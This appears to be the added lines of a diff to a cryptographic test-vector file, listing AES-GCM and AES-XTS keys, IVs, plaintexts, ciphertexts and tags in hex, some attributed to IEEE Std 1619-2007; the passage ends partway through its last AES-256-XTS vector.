+aes-128-gcm:feffe9928665731c6d6a8f9467308308:cafebabefacedbaddecaf888:d9313225f88406e5a55909c5aff5269a86a7a9531534f7da2e4c303d8a318a721c3c0c95956809532fcf0e2449a6b525b16aedf5aa0de657ba637b391aafd255:42831ec2217774244b7221b784d0d49ce3aa212f2c02a4e035c17e2329aca12e21d514b25466931c7d8f6a5aac84aa051ba30b396a0aac973d58e091473f5985::4d5c2af327cd64a62cf35abd2ba6fab4
+aes-128-gcm:feffe9928665731c6d6a8f9467308308:cafebabefacedbaddecaf888:d9313225f88406e5a55909c5aff5269a86a7a9531534f7da2e4c303d8a318a721c3c0c95956809532fcf0e2449a6b525b16aedf5aa0de657ba637b39:42831ec2217774244b7221b784d0d49ce3aa212f2c02a4e035c17e2329aca12e21d514b25466931c7d8f6a5aac84aa051ba30b396a0aac973d58e091:feedfacedeadbeeffeedfacedeadbeefabaddad2:5bc94fbc3221a5db94fae95ae7121a47
+aes-128-gcm:feffe9928665731c6d6a8f9467308308:cafebabefacedbad:d9313225f88406e5a55909c5aff5269a86a7a9531534f7da2e4c303d8a318a721c3c0c95956809532fcf0e2449a6b525b16aedf5aa0de657ba637b39:61353b4c2806934a777ff51fa22a4755699b2a714fcdc6f83766e5f97b6c742373806900e49f24b22b097544d4896b424989b5e1ebac0f07c23f4598:feedfacedeadbeeffeedfacedeadbeefabaddad2:3612d2e79e3b0785561be14aaca2fccb
+aes-128-gcm:feffe9928665731c6d6a8f9467308308:9313225df88406e555909c5aff5269aa6a7a9538534f7da1e4c303d2a318a728c3c0c95156809539fcf0e2429a6b525416aedbf5a0de6a57a637b39b:d9313225f88406e5a55909c5aff5269a86a7a9531534f7da2e4c303d8a318a721c3c0c95956809532fcf0e2449a6b525b16aedf5aa0de657ba637b39:8ce24998625615b603a033aca13fb894be9112a5c3a211a8ba262a3cca7e2ca701e4a9a4fba43c90ccdcb281d48c7c6fd62875d2aca417034c34aee5:feedfacedeadbeeffeedfacedeadbeefabaddad2:619cc5aefffe0bfa462af43c1699d050
+aes-192-gcm:000000000000000000000000000000000000000000000000:000000000000000000000000::::cd33b28ac773f74ba00ed1f312572435
+aes-192-gcm:000000000000000000000000000000000000000000000000:000000000000000000000000:00000000000000000000000000000000:98e7247c07f0fe411c267e4384b0f600::2ff58d80033927ab8ef4d4587514f0fb
+aes-192-gcm:feffe9928665731c6d6a8f9467308308feffe9928665731c:cafebabefacedbaddecaf888:d9313225f88406e5a55909c5aff5269a86a7a9531534f7da2e4c303d8a318a721c3c0c95956809532fcf0e2449a6b525b16aedf5aa0de657ba637b391aafd255:3980ca0b3c00e841eb06fac4872a2757859e1ceaa6efd984628593b40ca1e19c7d773d00c144c525ac619d18c84a3f4718e2448b2fe324d9ccda2710acade256::9924a7c8587336bfb118024db8674a14
+aes-192-gcm:feffe9928665731c6d6a8f9467308308feffe9928665731c:cafebabefacedbaddecaf888:d9313225f88406e5a55909c5aff5269a86a7a9531534f7da2e4c303d8a318a721c3c0c95956809532fcf0e2449a6b525b16aedf5aa0de657ba637b39:3980ca0b3c00e841eb06fac4872a2757859e1ceaa6efd984628593b40ca1e19c7d773d00c144c525ac619d18c84a3f4718e2448b2fe324d9ccda2710:feedfacedeadbeeffeedfacedeadbeefabaddad2:2519498e80f1478f37ba55bd6d27618c
+aes-192-gcm:feffe9928665731c6d6a8f9467308308feffe9928665731c:cafebabefacedbad:d9313225f88406e5a55909c5aff5269a86a7a9531534f7da2e4c303d8a318a721c3c0c95956809532fcf0e2449a6b525b16aedf5aa0de657ba637b39:0f10f599ae14a154ed24b36e25324db8c566632ef2bbb34f8347280fc4507057fddc29df9a471f75c66541d4d4dad1c9e93a19a58e8b473fa0f062f7:feedfacedeadbeeffeedfacedeadbeefabaddad2:65dcc57fcf623a24094fcca40d3533f8
+aes-192-gcm:feffe9928665731c6d6a8f9467308308feffe9928665731c:9313225df88406e555909c5aff5269aa6a7a9538534f7da1e4c303d2a318a728c3c0c95156809539fcf0e2429a6b525416aedbf5a0de6a57a637b39b:d9313225f88406e5a55909c5aff5269a86a7a9531534f7da2e4c303d8a318a721c3c0c95956809532fcf0e2449a6b525b16aedf5aa0de657ba637b39:d27e88681ce3243c4830165a8fdcf9ff1de9a1d8e6b447ef6ef7b79828666e4581e79012af34ddd9e2f037589b292db3e67c036745fa22e7e9b7373b:feedfacedeadbeeffeedfacedeadbeefabaddad2:dcf566ff291c25bbb8568fc3d376a6d9
+aes-256-gcm:0000000000000000000000000000000000000000000000000000000000000000:000000000000000000000000::::530f8afbc74536b9a963b4f1c4cb738b
+aes-256-gcm:0000000000000000000000000000000000000000000000000000000000000000:000000000000000000000000:00000000000000000000000000000000:cea7403d4d606b6e074ec5d3baf39d18::d0d1c8a799996bf0265b98b5d48ab919
+aes-256-gcm:feffe9928665731c6d6a8f9467308308feffe9928665731c6d6a8f9467308308:cafebabefacedbaddecaf888:d9313225f88406e5a55909c5aff5269a86a7a9531534f7da2e4c303d8a318a721c3c0c95956809532fcf0e2449a6b525b16aedf5aa0de657ba637b391aafd255:522dc1f099567d07f47f37a32a84427d643a8cdcbfe5c0c97598a2bd2555d1aa8cb08e48590dbb3da7b08b1056828838c5f61e6393ba7a0abcc9f662898015ad::b094dac5d93471bdec1a502270e3cc6c
+aes-256-gcm:feffe9928665731c6d6a8f9467308308feffe9928665731c6d6a8f9467308308:cafebabefacedbaddecaf888:d9313225f88406e5a55909c5aff5269a86a7a9531534f7da2e4c303d8a318a721c3c0c95956809532fcf0e2449a6b525b16aedf5aa0de657ba637b39:522dc1f099567d07f47f37a32a84427d643a8cdcbfe5c0c97598a2bd2555d1aa8cb08e48590dbb3da7b08b1056828838c5f61e6393ba7a0abcc9f662:feedfacedeadbeeffeedfacedeadbeefabaddad2:76fc6ece0f4e1768cddf8853bb2d551b
+aes-256-gcm:feffe9928665731c6d6a8f9467308308feffe9928665731c6d6a8f9467308308:cafebabefacedbad:d9313225f88406e5a55909c5aff5269a86a7a9531534f7da2e4c303d8a318a721c3c0c95956809532fcf0e2449a6b525b16aedf5aa0de657ba637b39:c3762df1ca787d32ae47c13bf19844cbaf1ae14d0b976afac52ff7d79bba9de0feb582d33934a4f0954cc2363bc73f7862ac430e64abe499f47c9b1f:feedfacedeadbeeffeedfacedeadbeefabaddad2:3a337dbf46a792c45e454913fe2ea8f2
+aes-256-gcm:feffe9928665731c6d6a8f9467308308feffe9928665731c6d6a8f9467308308:9313225df88406e555909c5aff5269aa6a7a9538534f7da1e4c303d2a318a728c3c0c95156809539fcf0e2429a6b525416aedbf5a0de6a57a637b39b:d9313225f88406e5a55909c5aff5269a86a7a9531534f7da2e4c303d8a318a721c3c0c95956809532fcf0e2449a6b525b16aedf5aa0de657ba637b39:5a8def2f0c9e53f1f75d7853659e2a20eeb2b22aafde6419a058ab4f6f746bf40fc0c3b780f244452da3ebf1c5d82cdea2418997200ef82e44ae7e3f:feedfacedeadbeeffeedfacedeadbeefabaddad2:a44a8266ee1c8eb0c8b5d4cf5ae9f19a
+# local add-ons, primarily streaming ghash tests
+# 128 bytes aad
+aes-128-gcm:00000000000000000000000000000000:000000000000000000000000:::d9313225f88406e5a55909c5aff5269a86a7a9531534f7da2e4c303d8a318a721c3c0c95956809532fcf0e2449a6b525b16aedf5aa0de657ba637b391aafd255522dc1f099567d07f47f37a32a84427d643a8cdcbfe5c0c97598a2bd2555d1aa8cb08e48590dbb3da7b08b1056828838c5f61e6393ba7a0abcc9f662898015ad:5fea793a2d6f974d37e68e0cb8ff9492
+# 48 bytes plaintext
+aes-128-gcm:00000000000000000000000000000000:000000000000000000000000:000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000:0388dace60b6a392f328c2b971b2fe78f795aaab494b5923f7fd89ff948bc1e0200211214e7394da2089b6acd093abe0::9dd0a376b08e40eb00c35f29f9ea61a4
+# 80 bytes plaintext
+aes-128-gcm:00000000000000000000000000000000:000000000000000000000000:0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000:0388dace60b6a392f328c2b971b2fe78f795aaab494b5923f7fd89ff948bc1e0200211214e7394da2089b6acd093abe0c94da219118e297d7b7ebcbcc9c388f28ade7d85a8ee35616f7124a9d5270291::98885a3a22bd4742fe7b72172193b163
+# 128 bytes plaintext
+aes-128-gcm:00000000000000000000000000000000:000000000000000000000000:0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000:0388dace60b6a392f328c2b971b2fe78f795aaab494b5923f7fd89ff948bc1e0200211214e7394da2089b6acd093abe0c94da219118e297d7b7ebcbcc9c388f28ade7d85a8ee35616f7124a9d527029195b84d1b96c690ff2f2de30bf2ec89e00253786e126504f0dab90c48a30321de3345e6b0461e7c9e6c6b7afedde83f40::cac45f60e31efd3b5a43b98a22ce1aa1
+# 192 bytes plaintext, iv is chosen so that initial counter LSB is 0xFF
+aes-128-gcm:00000000000000000000000000000000:ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000:000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000:56b3373ca9ef6e4a2b64fe1e9a17b61425f10d47a75a5fce13efc6bc784af24f4141bdd48cf7c770887afd573cca5418a9aeffcd7c5ceddfc6a78397b9a85b499da558257267caab2ad0b23ca476a53cb17fb41c4b8b475cb4f3f7165094c229c9e8c4dc0a2a5ff1903e501511221376a1cdb8364c5061a20cae74bc4acd76ceb0abc9fd3217ef9f8c90be402ddf6d8697f4f880dff15bfb7a6b28241ec8fe183c2d59e3f9dfff653c7126f0acb9e64211f42bae12af462b1070bef1ab5e3606::566f8ef683078bfdeeffa869d751a017
+# 80 bytes plaintext, submitted by Intel
+aes-128-gcm:843ffcf5d2b72694d19ed01d01249412:dbcca32ebf9b804617c3aa9e:000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f303132333435363738393a3b3c3d3e3f404142434445464748494a4b4c4d4e4f:6268c6fa2a80b2d137467f092f657ac04d89be2beaa623d61b5a868c8f03ff95d3dcee23ad2f1ab3a6c80eaf4b140eb05de3457f0fbc111a6b43d0763aa422a3013cf1dc37fe417d1fbfc449b75d4cc5:00000000000000000000000000000000101112131415161718191a1b1c1d1e1f:3b629ccfbc1119b7319e1dce2cd6fd6d
+
+# AES XTS test vectors from IEEE Std 1619-2007
+aes-128-xts:0000000000000000000000000000000000000000000000000000000000000000:00000000000000000000000000000000:0000000000000000000000000000000000000000000000000000000000000000:917cf69ebd68b2ec9b9fe9a3eadda692cd43d2f59598ed858c02c2652fbf922e
+aes-128-xts:1111111111111111111111111111111122222222222222222222222222222222:33333333330000000000000000000000:4444444444444444444444444444444444444444444444444444444444444444:c454185e6a16936e39334038acef838bfb186fff7480adc4289382ecd6d394f0
+aes-128-xts:fffefdfcfbfaf9f8f7f6f5f4f3f2f1f022222222222222222222222222222222:33333333330000000000000000000000:4444444444444444444444444444444444444444444444444444444444444444:af85336b597afc1a900b2eb21ec949d292df4c047e0b21532186a5971a227a89
+aes-128-xts:2718281828459045235360287471352631415926535897932384626433832795:00000000000000000000000000000000:000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f303132333435363738393a3b3c3d3e3f404142434445464748494a4b4c4d4e4f505152535455565758595a5b5c5d5e5f606162636465666768696a6b6c6d6e6f707172737475767778797a7b7c7d7e7f808182838485868788898a8b8c8d8e8f909192939495969798999a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b8b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f303132333435363738393a3b3c3d3e3f404142434445464748494a4b4c4d4e4f505152535455565758595a5b5c5d5e5f606162636465666768696a6b6c6d6e6f707172737475767778797a7b7c7d7e7f808182838485868788898a8b8c8d8e8f909192939495969798999a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b8b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff:27a7479befa1d476489f308cd4cfa6e2a96e4bbe3208ff25287dd3819616e89cc78cf7f5e543445f8333d8fa7f56000005279fa5d8b5e4ad40e736ddb4d35412328063fd2aab53e5ea1e0a9f332500a5df9487d07a5c92cc512c8866c7e860ce93fdf166a24912b422976146ae20ce846bb7dc9ba94a767aaef20c0d61ad02655ea92dc4c4e41a8952c651d33174be51a10c421110e6d81588ede82103a252d8a750e8768defffed9122810aaeb99f9172af82b604dc4b8e51bcb08235a6f4341332e4ca60482a4ba1a03b3e65008fc5da76b70bf1690db4eae29c5f1badd03c5ccf2a55d705ddcd86d449511ceb7ec30bf12b1fa35b913f9f747a8afd1b130e94bff94effd01a91735ca1726acd0b197c4e5b03393697e126826fb6bbde8ecc1e08298516e2c9ed03ff3c1b7860f6de76d4cecd94c8119855ef5297ca67e9f3e7ff72b1e99785ca0a7e7720c5b36dc6d72cac9574c8cbbc2f801e23e56fd344b07f22154beba0f08ce8891e643ed995c94d9a69c9f1b5f499027a78572aeebd74d20cc39881c213ee770b1010e4bea718846977ae119f7a023ab58cca0ad752afe656bb3c17256a9f6e9bf19fdd5a38fc82bbe872c5539edb609ef4f79c203ebb140f2e583cb2ad15b4aa5b655016a8449277dbd477ef2c8d6c017db738b18deb4a427d1923ce3ff262735779a418f20a282df920147beabe421ee5319d0568
+aes-128-xts:2718281828459045235360287471352631415926535897932384626433832795:01000000000000000000000000000000:27a7479befa1d476489f308cd4cfa6e2a96e4bbe3208ff25287dd3819616e89cc78cf7f5e543445f8333d8fa7f56000005279fa5d8b5e4ad40e736ddb4d35412328063fd2aab53e5ea1e0a9f332500a5df9487d07a5c92cc512c8866c7e860ce93fdf166a24912b422976146ae20ce846bb7dc9ba94a767aaef20c0d61ad02655ea92dc4c4e41a8952c651d33174be51a10c421110e6d81588ede82103a252d8a750e8768defffed9122810aaeb99f9172af82b604dc4b8e51bcb08235a6f4341332e4ca60482a4ba1a03b3e65008fc5da76b70bf1690db4eae29c5f1badd03c5ccf2a55d705ddcd86d449511ceb7ec30bf12b1fa35b913f9f747a8afd1b130e94bff94effd01a91735ca1726acd0b197c4e5b03393697e126826fb6bbde8ecc1e08298516e2c9ed03ff3c1b7860f6de76d4cecd94c8119855ef5297ca67e9f3e7ff72b1e99785ca0a7e7720c5b36dc6d72cac9574c8cbbc2f801e23e56fd344b07f22154beba0f08ce8891e643ed995c94d9a69c9f1b5f499027a78572aeebd74d20cc39881c213ee770b1010e4bea718846977ae119f7a023ab58cca0ad752afe656bb3c17256a9f6e9bf19fdd5a38fc82bbe872c5539edb609ef4f79c203ebb140f2e583cb2ad15b4aa5b655016a8449277dbd477ef2c8d6c017db738b18deb4a427d1923ce3ff262735779a418f20a282df920147beabe421ee5319d0568:264d3ca8512194fec312c8c9891f279fefdd608d0c027b60483a3fa811d65ee59d52d9e40ec5672d81532b38b6b089ce951f0f9c35590b8b978d175213f329bb1c2fd30f2f7f30492a61a532a79f51d36f5e31a7c9a12c286082ff7d2394d18f783e1a8e72c722caaaa52d8f065657d2631fd25bfd8e5baad6e527d763517501c68c5edc3cdd55435c532d7125c8614deed9adaa3acade5888b87bef641c4c994c8091b5bcd387f3963fb5bc37aa922fbfe3df4e5b915e6eb514717bdd2a74079a5073f5c4bfd46adf7d282e7a393a52579d11a028da4d9cd9c77124f9648ee383b1ac763930e7162a8d37f350b2f74b8472cf09902063c6b32e8c2d9290cefbd7346d1c779a0df50edcde4531da07b099c638e83a755944df2aef1aa31752fd323dcb710fb4bfbb9d22b925bc3577e1b8949e729a90bbafeacf7f7879e7b1147e28ba0bae940db795a61b15ecf4df8db07b824bb062802cc98a9545bb2aaeed77cb3fc6db15dcd7d80d7d5bc406c4970a3478ada8899b329198eb61c193fb6275aa8ca340344a75a862aebe92eee1ce032fd950b47d7704a3876923b4ad62844bf4a09c4dbe8b4397184b7471360c9564880aedddb9baa4af2e75394b08cd32ff479c57a07d3eab5d54de5f9738b8d27f27a9f0ab11799d7b7ffefb2704c95c6ad12c39f1e867a4b7b1d7818a4b753dfd2a89ccb45e001a03a867b187f225dd
+aes-128-xts:2718281828459045235360287471352631415926535897932384626433832795:02000000000000000000000000000000:264d3ca8512194fec312c8c9891f279fefdd608d0c027b60483a3fa811d65ee59d52d9e40ec5672d81532b38b6b089ce951f0f9c35590b8b978d175213f329bb1c2fd30f2f7f30492a61a532a79f51d36f5e31a7c9a12c286082ff7d2394d18f783e1a8e72c722caaaa52d8f065657d2631fd25bfd8e5baad6e527d763517501c68c5edc3cdd55435c532d7125c8614deed9adaa3acade5888b87bef641c4c994c8091b5bcd387f3963fb5bc37aa922fbfe3df4e5b915e6eb514717bdd2a74079a5073f5c4bfd46adf7d282e7a393a52579d11a028da4d9cd9c77124f9648ee383b1ac763930e7162a8d37f350b2f74b8472cf09902063c6b32e8c2d9290cefbd7346d1c779a0df50edcde4531da07b099c638e83a755944df2aef1aa31752fd323dcb710fb4bfbb9d22b925bc3577e1b8949e729a90bbafeacf7f7879e7b1147e28ba0bae940db795a61b15ecf4df8db07b824bb062802cc98a9545bb2aaeed77cb3fc6db15dcd7d80d7d5bc406c4970a3478ada8899b329198eb61c193fb6275aa8ca340344a75a862aebe92eee1ce032fd950b47d7704a3876923b4ad62844bf4a09c4dbe8b4397184b7471360c9564880aedddb9baa4af2e75394b08cd32ff479c57a07d3eab5d54de5f9738b8d27f27a9f0ab11799d7b7ffefb2704c95c6ad12c39f1e867a4b7b1d7818a4b753dfd2a89ccb45e001a03a867b187f225dd:fa762a3680b76007928ed4a4f49a9456031b704782e65e16cecb54ed7d017b5e18abd67b338e81078f21edb7868d901ebe9c731a7c18b5e6dec1d6a72e078ac9a4262f860beefa14f4e821018272e411a951502b6e79066e84252c3346f3aa62344351a291d4bedc7a07618bdea2af63145cc7a4b8d4070691ae890cd65733e7946e9021a1dffc4c59f159425ee6d50ca9b135fa6162cea18a939838dc000fb386fad086acce5ac07cb2ece7fd580b00cfa5e98589631dc25e8e2a3daf2ffdec26531659912c9d8f7a15e5865ea8fb5816d6207052bd7128cd743c12c8118791a4736811935eb982a532349e31dd401e0b660a568cb1a4711f552f55ded59f1f15bf7196b3ca12a91e488ef59d64f3a02bf45239499ac6176ae321c4a211ec545365971c5d3f4f09d4eb139bfdf2073d33180b21002b65cc9865e76cb24cd92c874c24c18350399a936ab3637079295d76c417776b94efce3a0ef7206b15110519655c956cbd8b2489405ee2b09a6b6eebe0c53790a12a8998378b33a5b71159625f4ba49d2a2fdba59fbf0897bc7aabd8d707dc140a80f0f309f835d3da54ab584e501dfa0ee977fec543f74186a802b9a37adb3e8291eca04d66520d229e60401e7282bef486ae059aa70696e0e305d777140a7a883ecdcb69b9ff938e8a4231864c69ca2c2043bed007ff3e605e014bcf518138dc3a25c5e236171a2d01d6
+aes-128-xts:2718281828459045235360287471352631415926535897932384626433832795:fd000000000000000000000000000000:8e41b78c390b5af9d758bb214a67e9f6bf7727b09ac6124084c37611398fa45daad94868600ed391fb1acd4857a95b466e62ef9f4b377244d1c152e7b30d731aad30c716d214b707aed99eb5b5e580b3e887cf7497465651d4b60e6042051da3693c3b78c14489543be8b6ad0ba629565bba202313ba7b0d0c94a3252b676f46cc02ce0f8a7d34c0ed229129673c1f61aed579d08a9203a25aac3a77e9db60267996db38df637356d9dcd1632e369939f2a29d89345c66e05066f1a3677aef18dea4113faeb629e46721a66d0a7e785d3e29af2594eb67dfa982affe0aac058f6e15864269b135418261fc3afb089472cf68c45dd7f231c6249ba0255e1e033833fc4d00a3fe02132d7bc3873614b8aee34273581ea0325c81f0270affa13641d052d36f0757d484014354d02d6883ca15c24d8c3956b1bd027bcf41f151fd8023c5340e5606f37e90fdb87c86fb4fa634b3718a30bace06a66eaf8f63c4aa3b637826a87fe8cfa44282e92cb1615af3a28e53bc74c7cba1a0977be9065d0c1a5dec6c54ae38d37f37aa35283e048e5530a85c4e7a29d7b92ec0c3169cdf2a805c7604bce60049b9fb7b8eaac10f51ae23794ceba68bb58112e293b9b692ca721b37c662f8574ed4dba6f88e170881c82cddc1034a0ca7e284bf0962b6b26292d836fa9f73c1ac770eef0f2d3a1eaf61d3e03555fd424eedd67e18a18094f888:d55f684f81f4426e9fde92a5ff02df2ac896af63962888a97910c1379e20b0a3b1db613fb7fe2e07004329ea5c22bfd33e3dbe4cf58cc608c2c26c19a2e2fe22f98732c2b5cb844cc6c0702d91e1d50fc4382a7eba5635cd602432a2306ac4ce82f8d70c8d9bc15f918fe71e74c622d5cf71178bf6e0b9cc9f2b41dd8dbe441c41cd0c73a6dc47a348f6702f9d0e9b1b1431e948e299b9ec2272ab2c5f0c7be86affa5dec87a0bee81d3d50007edaa2bcfccb35605155ff36ed8edd4a40dcd4b243acd11b2b987bdbfaf91a7cac27e9c5aea525ee53de7b2d3332c8644402b823e94a7db26276d2d23aa07180f76b4fd29b9c0823099c9d62c519880aee7e9697617c1497d47bf3e571950311421b6b734d38b0db91eb85331b91ea9f61530f54512a5a52a4bad589eb69781d537f23297bb459bdad2948a29e1550bf4787e0be95bb173cf5fab17dab7a13a052a63453d97ccec1a321954886b7a1299faaeecae35c6eaaca753b041b5e5f093bf83397fd21dd6b3012066fcc058cc32c3b09d7562dee29509b5839392c9ff05f51f3166aaac4ac5f238038a3045e6f72e48ef0fe8bc675e82c318a268e43970271bf119b81bf6a982746554f84e72b9f00280a320a08142923c23c883423ff949827f29bbacdc1ccdb04938ce6098c95ba6b32528f4ef78eed778b2e122ddfd1cbdd11d1c0a6783e011fc536d63d053260637
+aes-128-xts:2718281828459045235360287471352631415926535897932384626433832795:fe000000000000000000000000000000:d55f684f81f4426e9fde92a5ff02df2ac896af63962888a97910c1379e20b0a3b1db613fb7fe2e07004329ea5c22bfd33e3dbe4cf58cc608c2c26c19a2e2fe22f98732c2b5cb844cc6c0702d91e1d50fc4382a7eba5635cd602432a2306ac4ce82f8d70c8d9bc15f918fe71e74c622d5cf71178bf6e0b9cc9f2b41dd8dbe441c41cd0c73a6dc47a348f6702f9d0e9b1b1431e948e299b9ec2272ab2c5f0c7be86affa5dec87a0bee81d3d50007edaa2bcfccb35605155ff36ed8edd4a40dcd4b243acd11b2b987bdbfaf91a7cac27e9c5aea525ee53de7b2d3332c8644402b823e94a7db26276d2d23aa07180f76b4fd29b9c0823099c9d62c519880aee7e9697617c1497d47bf3e571950311421b6b734d38b0db91eb85331b91ea9f61530f54512a5a52a4bad589eb69781d537f23297bb459bdad2948a29e1550bf4787e0be95bb173cf5fab17dab7a13a052a63453d97ccec1a321954886b7a1299faaeecae35c6eaaca753b041b5e5f093bf83397fd21dd6b3012066fcc058cc32c3b09d7562dee29509b5839392c9ff05f51f3166aaac4ac5f238038a3045e6f72e48ef0fe8bc675e82c318a268e43970271bf119b81bf6a982746554f84e72b9f00280a320a08142923c23c883423ff949827f29bbacdc1ccdb04938ce6098c95ba6b32528f4ef78eed778b2e122ddfd1cbdd11d1c0a6783e011fc536d63d053260637:72efc1ebfe1ee25975a6eb3aa8589dda2b261f1c85bdab442a9e5b2dd1d7c3957a16fc08e526d4b1223f1b1232a11af274c3d70dac57f83e0983c498f1a6f1aecb021c3e70085a1e527f1ce41ee5911a82020161529cd82773762daf5459de94a0a82adae7e1703c808543c29ed6fb32d9e004327c1355180c995a07741493a09c21ba01a387882da4f62534b87bb15d60d197201c0fd3bf30c1500a3ecfecdd66d8721f90bcc4c17ee925c61b0a03727a9c0d5f5ca462fbfa0af1c2513a9d9d4b5345bd27a5f6e653f751693e6b6a2b8ead57d511e00e58c45b7b8d005af79288f5c7c22fd4f1bf7a898b03a5634c6a1ae3f9fae5de4f296a2896b23e7ed43ed14fa5a2803f4d28f0d3ffcf24757677aebdb47bb388378708948a8d4126ed1839e0da29a537a8c198b3c66ab00712dd261674bf45a73d67f76914f830ca014b65596f27e4cf62de66125a5566df9975155628b400fbfb3a29040ed50faffdbb18aece7c5c44693260aab386c0a37b11b114f1c415aebb653be468179428d43a4d8bc3ec38813eca30a13cf1bb18d524f1992d44d8b1a42ea30b22e6c95b199d8d182f8840b09d059585c31ad691fa0619ff038aca2c39a943421157361717c49d322028a74648113bd8c9d7ec77cf3c89c1ec8718ceff8516d96b34c3c614f10699c9abc4ed0411506223bea16af35c883accdbe1104eef0cfdb54e12fb230a
+aes-128-xts:2718281828459045235360287471352631415926535897932384626433832795:ff000000000000000000000000000000:72efc1ebfe1ee25975a6eb3aa8589dda2b261f1c85bdab442a9e5b2dd1d7c3957a16fc08e526d4b1223f1b1232a11af274c3d70dac57f83e0983c498f1a6f1aecb021c3e70085a1e527f1ce41ee5911a82020161529cd82773762daf5459de94a0a82adae7e1703c808543c29ed6fb32d9e004327c1355180c995a07741493a09c21ba01a387882da4f62534b87bb15d60d197201c0fd3bf30c1500a3ecfecdd66d8721f90bcc4c17ee925c61b0a03727a9c0d5f5ca462fbfa0af1c2513a9d9d4b5345bd27a5f6e653f751693e6b6a2b8ead57d511e00e58c45b7b8d005af79288f5c7c22fd4f1bf7a898b03a5634c6a1ae3f9fae5de4f296a2896b23e7ed43ed14fa5a2803f4d28f0d3ffcf24757677aebdb47bb388378708948a8d4126ed1839e0da29a537a8c198b3c66ab00712dd261674bf45a73d67f76914f830ca014b65596f27e4cf62de66125a5566df9975155628b400fbfb3a29040ed50faffdbb18aece7c5c44693260aab386c0a37b11b114f1c415aebb653be468179428d43a4d8bc3ec38813eca30a13cf1bb18d524f1992d44d8b1a42ea30b22e6c95b199d8d182f8840b09d059585c31ad691fa0619ff038aca2c39a943421157361717c49d322028a74648113bd8c9d7ec77cf3c89c1ec8718ceff8516d96b34c3c614f10699c9abc4ed0411506223bea16af35c883accdbe1104eef0cfdb54e12fb230a:3260ae8dad1f4a32c5cafe3ab0eb95549d461a67ceb9e5aa2d3afb62dece0553193ba50c75be251e08d1d08f1088576c7efdfaaf3f459559571e12511753b07af073f35da06af0ce0bbf6b8f5ccc5cea500ec1b211bd51f63b606bf6528796ca12173ba39b8935ee44ccce646f90a45bf9ccc567f0ace13dc2d53ebeedc81f58b2e41179dddf0d5a5c42f5d8506c1a5d2f8f59f3ea873cbcd0eec19acbf325423bd3dcb8c2b1bf1d1eaed0eba7f0698e4314fbeb2f1566d1b9253008cbccf45a2b0d9c5c9c21474f4076e02be26050b99dee4fd68a4cf890e496e4fcae7b70f94ea5a9062da0daeba1993d2ccd1dd3c244b8428801495a58b216547e7e847c46d1d756377b6242d2e5fb83bf752b54e0df71e889f3a2bb0f4c10805bf3c590376e3c24e22ff57f7fa965577375325cea5d920db94b9c336b455f6e894c01866fe9fbb8c8d3f70a2957285f6dfb5dcd8cbf54782f8fe7766d4723819913ac773421e3a31095866bad22c86a6036b2518b2059b4229d18c8c2ccbdf906c6cc6e82464ee57bddb0bebcb1dc645325bfb3e665ef7251082c88ebb1cf203bd779fdd38675713c8daadd17e1cabee432b09787b6ddf3304e38b731b45df5df51b78fcfb3d32466028d0ba36555e7e11ab0ee0666061d1645d962444bc47a38188930a84b4d561395c73c087021927ca638b7afc8a8679ccb84c26555440ec7f10445cd
+
+aes-256-xts:27182818284590452353602874713526624977572470936999595749669676273141592653589793238462643383279502884197169399375105820974944592:ff000000000000000000000000000000:000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f303132333435363738393a3b3c3d3e3f404142434445464748494a4b4c4d4e4f505152535455565758595a5b5c5d5e5f606162636465666768696a6b6c6d6e6f707172737475767778797a7b7c7d7e7f808182838485868788898a8b8c8d8e8f909192939495969798999a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b8b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f303132333435363738393a3b3c3d3e3f404142434445464748494a4b4c4d4e4f505152535455565758595a5b5c5d5e5f606162636465666768696a6b6c6d6e6f707172737475767778797a7b7c7d7e7f808182838485868788898a8b8c8d8e8f909192939495969798999a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b8b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff:1c3b3a102f770386e4836c99e370cf9bea00803f5e482357a4ae12d414a3e63b5d31e276f8fe4a8d66b317f9ac683f44680a86ac35adfc3345befecb4bb188fd5776926c49a3095eb108fd1098baec70aaa66999a72a82f27d848b21d4a741b0c5cd4d5fff9dac89aeba122961d03a757123e9870f8acf1000020887891429ca2a3e7a7d7df7b